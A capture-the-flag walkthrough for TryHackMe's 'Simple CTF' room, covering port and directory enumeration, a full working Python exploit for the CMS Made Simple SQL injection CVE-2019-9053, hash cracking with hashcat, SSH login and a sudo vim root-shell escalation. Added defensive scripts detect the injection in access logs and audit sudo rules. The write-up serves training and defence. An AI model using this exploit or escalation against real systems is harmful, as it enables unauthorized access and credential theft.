Try Hack Me - Simple CTF

Beginner level ctf


Howdy my fellow Cyber Enthusiasts! Welcome to another room Try Hack Me offers! So let's dive in! 😄 You can click on the "Start AttackBox" button to get a Linux machine on the right side of your page, so you can follow this walkthrough.

💡
How many services are running under port 1000?

Let's start with a basic nmap scan.

💡
Nmap (Network Mapper) is a free, open-source tool used for network discovery and security auditing. It helps administrators and security professionals identify devices on a network, detect open ports and running services, determine operating systems, and assess potential security risks. Nmap is widely used for tasks like network inventory, vulnerability assessment, and troubleshooting connectivity issues.
$ sudo nmap -sV -p- $IP

# -sV: Probe open ports to determine service/version info
# -p-: Scans all ports from 1-65535
Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-12 16:28 +0300
Nmap scan report for 10.112.155.12
Host is up (0.047s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
[redacted]/tcp   open  [redacted]     [redacted]
[redacted]/tcp   open  [redacted]    [redacted]
[redacted]/tcp open  [redacted]     [redacted]
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.28 seconds
💡
What is running on the higher port?

Just identify the service based on the previous nmap scan.

💡
What's the CVE you're using against the application?

Hmm... Let's enumerate the target a bit further. We might find something interesting. Let's use gobuster.

💡
Gobuster is a fast, open-source command-line tool written in Go that is commonly used for web and network enumeration. It helps security professionals discover hidden directories, files, subdomains, virtual hosts, and cloud storage buckets by performing brute-force searches with wordlists. Gobuster is widely used during penetration testing and security assessments to uncover exposed resources and misconfigurations.
$ gobuster dir -u 10.112.155.12:80 -w /usr/share/dirb/wordlists/big.txt
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.112.155.12:80
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
.htpasswd            (Status: 403) [Size: 297]
.htaccess            (Status: 403) [Size: 297]
robots.txt           (Status: 200) [Size: 929]
server-status        (Status: 403) [Size: 301]
[redacted]               (Status: 301) [Size: 315] [--> http://10.112.155.12/[redacted]/]

Great. Let's go there now. 😄

In the page footer, we found that this web server runs CMS Made Simple, specifically version 2.2.8. Let's see if we can find a CVE for this.

With a bit of searching we found the following CVE. Nice job!

NVD - CVE-2019-9053
💡
To what kind of vulnerability is the application vulnerable?

The mentioned CVE provides a short description to help guide us further regarding the vulnerability.

💡
An issue was discovered in CMS Made Simple 2.2.8. It is possible with the News module, through a crafted URL, to achieve unauthenticated blind time-based SQL injection via the m1_idlist parameter.
💡
What's the password?

We can use the exploit found on the following webpage, or use searchsploit from our terminal.

CMS Made Simple < 2.2.10 - SQL Injection (CVE-2019-9053), webapps exploit for the PHP platform
$ searchsploit 46635 
-------------------------------------------- ---------------------------------
 Exploit Title                              |  Path
-------------------------------------------- ---------------------------------
CMS Made Simple < 2.2.10 - SQL Injection    | php/webapps/46635.py
-------------------------------------------- ---------------------------------
Shellcodes: No Results
$ locate 46635.py                   
/usr/share/exploitdb/exploits/php/webapps/46635.py

The code is written in Python 2. We can convert it to Python 3 using an online converter.

Python2to3 - Automated Python 2 to 3 converter online
#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053

import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)

options, args = parser.parse_args()
if not options.url:
    print("[+] Specify an url target")
    print("[+] Example usage (no cracking password): exploit.py -u http://target-uri")
    print("[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist")
    print("[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.")
    exit()

url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
flag = True
password = ""
temp_password = ""
TIME = 1
db_name = ""
output = ""
email = ""

salt = ''
wordlist = ""
if options.wordlist:
    wordlist += options.wordlist

def crack_password():
    global password
    global output
    global wordlist
    global salt
    with open(wordlist) as words:  # avoid shadowing the dict builtin
        for line in words:
            line = line.rstrip("\n")
            beautify_print_try(line)
            # Python 3: hashlib needs bytes; the stored hash is md5(salt + password)
            if hashlib.md5((salt + line).encode()).hexdigest() == password:
                output += "\n[+] Password cracked: " + line
                break

def beautify_print_try(value):
    global output
    print("\033c")
    cprint(output,'green', attrs=['bold'])
    cprint('[*] Try: ' + value, 'red', attrs=['bold'])

def beautify_print():
    global output
    print("\033c")
    cprint(output,'green', attrs=['bold'])

def dump_salt():
    global flag
    global salt
    global output
    ord_salt = ""
    ord_salt_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_salt = salt + dictionary[i]
            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_salt)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            salt = temp_salt
            ord_salt = ord_salt_temp
    flag = True
    output += '\n[+] Salt for password found: ' + salt

def dump_password():
    global flag
    global password
    global output
    ord_password = ""
    ord_password_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_password = password + dictionary[i]
            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_password)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
            payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            password = temp_password
            ord_password = ord_password_temp
    flag = True
    output += '\n[+] Password found: ' + password

def dump_username():
    global flag
    global db_name
    global output
    ord_db_name = ""
    ord_db_name_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_db_name = db_name + dictionary[i]
            ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_db_name)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            db_name = temp_db_name
            ord_db_name = ord_db_name_temp
    output += '\n[+] Username found: ' + db_name
    flag = True

def dump_email():
    global flag
    global email
    global output
    ord_email = ""
    ord_email_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_email = email + dictionary[i]
            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_email)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            email = temp_email
            ord_email = ord_email_temp
    output += '\n[+] Email found: ' + email
    flag = True

dump_salt()
dump_username()
dump_email()
dump_password()

if options.cracking:
    print(colored("[*] Now try to crack password"))
    crack_password()

beautify_print()
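The requests this script sends leave a recognizable trail in the web server's access log: every probe hits moduleinterface.php with mact=News and an m1_idlist value that is not a plain list of article ids. The detector below is an added example (not part of the original post or of the exploit) that runs over constructed Apache combined-format log lines; the source addresses and the /cms path are made up, and the m1_idlist allowlist rule assumes that legitimate values consist only of comma-separated numeric ids.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format). The IPs and the
# /cms path are made up; only the parameter names come from the CVE description.
SAMPLE_LOG = """\
198.51.100.5 - - [12/May/2026:16:30:01 +0300] "GET /cms/moduleinterface.php?mact=News,m1_,default,0&m1_idlist=1,2,3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [12/May/2026:16:30:02 +0300] "GET /cms/moduleinterface.php?mact=News,m1_,default,0&m1_idlist=a,b,1,5))+and+(select+sleep(1)+from+cms_siteprefs+where+sitepref_value+like+0x3125+and+sitepref_name+like+0x736974656d61736b)+--+ HTTP/1.1" 200 5120 "-" "python-requests/2.31.0"
198.51.100.9 - - [12/May/2026:16:30:04 +0300] "GET /cms/moduleinterface.php?mact=News,m1_,default,0&m1_idlist=a,b,1,5))+and+(select+sleep(1)+from+cms_users+where+username+like+0x6125+and+user_id+like+0x31)+--+ HTTP/1.1" 200 5120 "-" "python-requests/2.31.0"
198.51.100.7 - - [12/May/2026:16:30:05 +0300] "GET /cms/index.php?page=news HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [12/May/2026:16:30:06 +0300] "GET /cms/moduleinterface.php?mact=News,m1_,default,0&m1_idlist=7%2C8 HTTP/1.1" 200 5120 "-" "python-requests/2.31.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumption: legitimate m1_idlist values are comma-separated numeric article ids.
IDLIST_OK = re.compile(r'^[0-9, ]*$')
# Time-based probes need a delay primitive inside the injected expression.
DELAY_RE = re.compile(r'\b(?:sleep|benchmark)\s*\(', re.IGNORECASE)


def inspect_request(target):
    """Return a reason string if `target` looks like a News-module injection
    attempt, otherwise None. Values are URL-decoded before matching."""
    parts = urlsplit(target)
    if not parts.path.endswith('/moduleinterface.php'):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if not any(v.startswith('News,') for v in params.get('mact', [])):
        return None
    for value in params.get('m1_idlist', []):
        if DELAY_RE.search(value):
            return 'time-based SQLi probe in m1_idlist'
        if not IDLIST_OK.match(value):
            return 'non-numeric m1_idlist value'
    return None


def scan_log(text):
    """Parse access-log lines and collect suspicious News-module requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = inspect_request(m.group('target'))
        if reason:
            findings.append({'ip': m.group('ip'), 'ts': m.group('ts'),
                             'reason': reason})
    return findings


def offenders(findings):
    """Count findings per source address, most active first."""
    return Counter(f['ip'] for f in findings).most_common()


if __name__ == '__main__':
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['ip']} {h['reason']}")
    print('per-source totals:', offenders(hits))
```

The allowlist check is the more robust of the two rules: it fires on any non-numeric id list, so it catches variants that do not spell out sleep(), while the delay pattern is there to label the time-based technique explicitly. The %2C line shows why decoding happens before matching; it is a benign request once decoded.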

Next, let's create a file called crack.hash that contains the hash and the salt, so we are able to crack it.

echo '0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2' > crack.hash

# -m 20 is md5($salt.$pass), the same ordering the exploit's crack_password() uses (md5(salt + line))
hashcat -m 20 crack.hash /usr/share/wordlists/rockyou.txt

# once the run finishes, print the cracked result stored in the potfile
hashcat -m 20 --show crack.hash

Wait for a couple of seconds and it will be cracked!

💡
Where can you login with the details obtained?

Remember our nmap scan at the beginning? Try to login to one of those services and you will find the answer.

💡
What's the user flag?

Remember to use the changed ssh port.

ssh [redacted]@10.112.155.12 -p 2222
$ cat user.txt
[redacted]
💡
Is there any other user in the home directory? What's its name?
$ cd /home
$ ls
[redacted]  [redacted]
💡
What can you leverage to spawn a privileged shell?

Just use the following command to be able to see if you can spawn a privileged shell.

$ sudo -l
User [redacted] may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/[redacted]
💡
What's the root flag?
💡
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
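The sudo -l check above is easy to automate across a fleet so that rules like this one are caught before a CTF-style walkthrough finds them. The audit script below is an added example, not from the original post: it parses sudo -l output (a constructed sample; the user alice, the host and the commands are made up) and flags rules that run as root, that need no password, or that point at binaries GTFOBins documents as able to spawn a shell. SHELL_ESCAPE_BINARIES is an illustrative subset, not a complete list.

```python
import os
import re

# Constructed `sudo -l` output for illustration; user, host and commands are made up.
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on box:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on box:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/apt-get update, /usr/bin/systemctl restart nginx
    (ALL : ALL) ALL
"""

# Illustrative subset of binaries GTFOBins documents as able to spawn a shell
# when run under sudo; extend it from GTFOBins for a real audit.
SHELL_ESCAPE_BINARIES = {"vim", "vi", "nano", "less", "more", "man", "find", "awk"}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG_RE = re.compile(r"^([A-Z]+):\s*")


def parse_rule(line):
    """Split one sudoers rule line into run-as spec, tags and command list."""
    m = RULE_RE.match(line)
    if not m:
        return None
    rest = m.group("rest")
    tags = set()
    while (t := TAG_RE.match(rest)):  # NOPASSWD:, SETENV:, NOEXEC: ...
        tags.add(t.group(1))
        rest = rest[t.end():]
    commands = [c.strip() for c in rest.split(",") if c.strip()]
    return {"runas": m.group("runas").strip(), "tags": tags, "commands": commands}


def assess_command(rule, cmd):
    """Rate one command under one rule."""
    binary = os.path.basename(cmd.split()[0])
    runs_as_root = rule["runas"].split(":")[0].strip() in ("root", "ALL")
    nopasswd = "NOPASSWD" in rule["tags"]
    if cmd == "ALL":
        risk, why = "high", "unrestricted sudo"
    elif binary in SHELL_ESCAPE_BINARIES:
        risk, why = "high", f"{binary} can spawn a shell (see GTFOBins)"
    else:
        risk, why = "info", "not in the local shell-escape list; review manually"
    if risk == "high" and nopasswd and runs_as_root:
        risk = "critical"  # root shell without even a password prompt
    return {"command": cmd, "runas": rule["runas"], "nopasswd": nopasswd,
            "risk": risk, "why": why}


def audit_sudo_l(text):
    """Parse `sudo -l` output and return one finding per command."""
    findings = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        rule = parse_rule(line)
        if rule:
            for cmd in rule["commands"]:
                findings.append(assess_command(rule, cmd))
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        tag = "NOPASSWD " if f["nopasswd"] else ""
        print(f"[{f['risk']:8}] ({f['runas']}) {tag}{f['command']}: {f['why']}")
```

The fix for a critical finding is the usual one: drop the rule, or if the task is genuinely needed, grant a wrapper script with fixed arguments rather than a general-purpose editor or pager.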

There's a great website that is worth taking a look at. 😄

vim | GTFOBins
sudo vim -c ':!/bin/sh'

# id
uid=0(root) gid=0(root) groups=0(root)

# cd /root
# ls
root.txt
# cat root.txt
[redacted]

Congratulations! You have solved this room! 🎉 🎉 🎉